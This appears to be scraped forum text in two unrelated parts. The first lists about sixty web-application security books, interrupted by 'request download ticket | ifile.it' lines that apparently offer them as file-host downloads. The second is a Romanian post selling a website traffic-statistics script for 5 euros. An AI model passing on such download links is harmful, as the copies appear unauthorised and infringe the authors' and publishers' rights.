A mixed bag: new and old/ attack and defense/ for developers, managers, testers/ PHP, AJAX, Rails, Java, .NET, Oracle etc. Ajax Security [2007] Apache Security [2005] Applied Oracle Security: Developing Secure Database and Middleware Environments [2009] BackTrack 4: Assuring Security by Penetration Testing [2011] Beginning ASP.NET Security [2010] Core Security Patterns: Best Practices and Strategies for J2EE, Web Services, and Identity Management [2005] Cracking Drupal: A Drop in the Bucket [2009] Developer's Guide to Web Application Security [2007] E-Commerce: A Control and Security Guide [2004] Enterprise Web Services Security [2005] Essential PHP Security [2005] Expert Web Services Security in the .NET Platform [2004] request download ticket | ifile.it --- Google Hacking for Penetration Testers [2005] Google Hacking for Penetration Testers, Volume 2 [2007] Hacker Web Exploitation Uncovered [2005] Hacking Exposed Web 2.0 [2007] Hacking Exposed Web Applications, 3rd Edition [2011] HackNotes Web Security Pocket Reference [2003] Hack Proofing ColdFusion [2002] Hack Proofing Your E-Commerce Site [2001] Hack Proofing Your Web Applications [2001] How to Break Web Software: Functional and Security Testing of Web Applications and Web Services [2006] Implementing Database Security and Auditing: Includes Examples for Oracle, SQL Server, DB2 UDB, Sybase [2005] Joomla! Web Security [2008] Mastering Web Services Security [2003] ModSecurity 2.5 [2009] ModSecurity Handbook [2010] Oracle Security [1998] php architect's Guide to PHP Security [2005] Practical Oracle Security: Your Unauthorized Guide to Relational Database Security [2007] request download ticket | ifile.it --- Preventing Web Attacks with Apache [2006] Pro PHP Security: From Application Security Principles to the Implementation of XSS Defenses, Second Edition [2010] Secure E-Government Web Services [2005] Securing PHP Web Applications [2009] Security for Web Services and Service-Oriented Architectures [2009] Security Fundamentals for E-Commerce [2002] Security on Rails [2009] Security Technologies for the World Wide Web, Second Edition [2002] Seven Deadliest Web Application Attacks [2010] SQL Injection Attacks and Defense [2009] SQL Server Security Distilled [2004] SSL & TLS Essentials: Securing the Web [2000] The Oracle Hacker's Handbook: Hacking and Defending Oracle [2007] The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws [2007] The Database Hacker's Handbook: Defending Database Servers [2005] Web 2.0 Security - Defending AJAX, RIA, AND SOA [2007] Web Application Vulnerabilities: Detect, Exploit, Prevent [2007] Web Hacking: Attacks and Defense [2002] Web Security, Privacy and Commerce, 2nd Edition [2002] Web Security Testing Cookbook: Systematic Techniques to Find Problems Fast [2008] Web Services Security [2003] XML Security [2002] XSS Exploits and Defense [2007] request download ticket | ifile.it

Dupa cum si titlul ii spune, vand script similar cu cel de pe WTA, GTop, sau WTStats.com, acesta fiind un script de analiza si statistica trafic web. Ce face scriptul? Monitorizeaza traficul site-urilor inscrise, atat vizitele unice cat si afisarile, tot odata ofera detalii despre urmatoarele: - Browsere (top 10 cele mai folosite browsere - poate fi schimbat cu mai mult sau mai putin) - Tari - arata din ce tara intra cei mai multi vizitatori (vine impreuna cu un chart prin Google API) - Sisteme de Operare - Top sisteme de operare - Cei mai buni referreri - Arata ce site este cel mai bun referrer - Cele mai folosite rezolutii - Top 10 rezolutii folosite de vizitatori - Ultimii 10 vizitatori - Arata ultimii 10 vizitatori care au accesat site-ul, incluzant browserul, sistemul de operare, rezolutia, referrer-ul, ora si data la care vizitatorul a intrat. - Cele mai bune cuvinte cheie - Afiseaza cele mai bune cuvinte cheie prin care vizitatorul ajunge pe site-ul monitorizat. (din SE) Scriptul este foarte flexibil, cam toate din cele mai sus pot fi printate pe charturi. "Features": - Inregistrare cu reCaptcha - Statistici private pentru userii inscrisi (toate statisticile pot fi facute private) - JqueryUI integrat in tema care o dau default, eu vand scriptul nu tema insa acesta vine cu o tema asemanatoare cu cea de pe livestats.ro - Imagini multiple - Puteti pune cate imagini doriti in panoul userului, prin imagine se intelege codul care apare pe site-ul utilizatorul impreuna cu o imagine. (culori diferite and all that stuff). Instalare: Include pasi de instalare, o pot face eu pentru un fee de 3e (euro). Support: Ofer support pentru script doar in cazul in care acesta nu este modificat de la starea lui initala, daca este modificat va priveste. Accept plata doar prin PayPal, pretul este 5e (euro) Scriptul poate fi cumparat de aici WTstats Script iar demo-ul este aici: Demo